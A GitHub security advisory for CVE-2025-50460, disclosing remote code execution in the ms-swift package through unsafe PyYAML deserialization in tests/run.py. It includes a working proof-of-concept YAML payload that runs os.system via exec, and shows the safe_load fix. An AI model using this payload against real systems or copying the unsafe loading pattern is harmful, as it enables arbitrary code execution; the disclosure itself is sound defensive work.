Skip to content

Remote Code Execution in modelscope/ms-swift via unsafe PyYAML deserialization

Low
tastelikefeet published GHSA-fm6c-f59h-7mmg Jul 31, 2025

Package

pip ms-swift (pip)

Affected versions

ms-swift<3.7

Patched versions

3.7

Description

CVE-2025-50460: Remote Code Execution in modelscope/ms-swift via unsafe PyYAML deserialization

Original CVE location

Status: RESERVED
This CVE ID has been assigned but is not yet published in the official CVE list.

A remote code execution (RCE) vulnerability exists in the ms-swift project version 3.3.0 due to unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1). If an attacker can control the content of the YAML configuration file passed to the --run_config parameter, arbitrary code can be executed during deserialization. This can lead to full system compromise. The vulnerability is triggered when a malicious YAML file is loaded, allowing the execution of arbitrary Python commands such as os.system(). It is recommended to upgrade PyYAML to version 5.4 or higher, and to use yaml.safe_load() to mitigate the issue.

Description

A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.

If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.

Affected Repository

Vulnerable Code

if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Proof of Concept (PoC)

Step 1: Create malicious YAML file (exploit.yaml)

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Step 2: Execute with vulnerable PyYAML (<= 5.3.1)

import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

This results in execution of os.system, proving code execution.

Mitigation

  • Replace yaml.load() with yaml.safe_load()
  • Upgrade PyYAML to version 5.4 or later

Example Fix:

# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

CVE Status

Field Value
CVE ID CVE-2025-50460
CVSS Score TBD
CWE CWE-502: Deserialization of Untrusted Data
Report Date 2025-04-25
Disclosure Date 2025-07-30
Affected Version latest
Fix Version

Author

Severity

Low

CVE ID

CVE-2025-50460

Weaknesses

No CWEs

Credits